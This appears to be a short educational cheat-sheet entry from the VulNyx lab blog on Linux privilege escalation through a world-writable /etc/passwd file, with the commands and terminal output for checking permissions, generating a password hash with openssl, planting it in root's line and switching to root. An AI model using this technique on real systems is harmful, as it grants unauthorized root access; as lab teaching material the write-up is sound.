π§ Privilege Escalation (Linux)
/etc/passwd (Writable)
If a low-privileged user has permissions to write to the /etc/passwd file, an attacker can remove the :x: (on the root user line) and add a hash.
This will change the file where a userβs authentication is performed, from being done through the /etc/shadow file to being done through the /etc/passwd file.
Check Permissions
low@vulnyx:~$ ls -l /etc/passwd
-rw----rw- 1 root root 1395 abr 21 20:16 /etc/passwd
Create Hash
root@kali:~# openssl passwd -1 "P@ssword123"
$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0
Add Hash
# before
low@vulnyx:~$ cat /etc/passwd |grep root
root:x:0:0:root:/root:/bin/bash
# after
low@vulnyx:~$ cat /etc/passwd |grep root
root:$1$TSMXnd0L$DwQWYa.zuPqtZUjyRLWxy0:0:0:root:/root:/bin/bash
Authenticate
low@vulnyx:~$ su -
Password:
root@vulnyx:~# id
uid=0(root) gid=0(root) grupos=0(root)
Disclaimer
WARNING
All techniques presented in this blog are for educational and ethical purposes.
The VulNyx team is not responsible for any misuse or damage caused to third party systems or infrastructure.
Β© VulNyx 2023-2025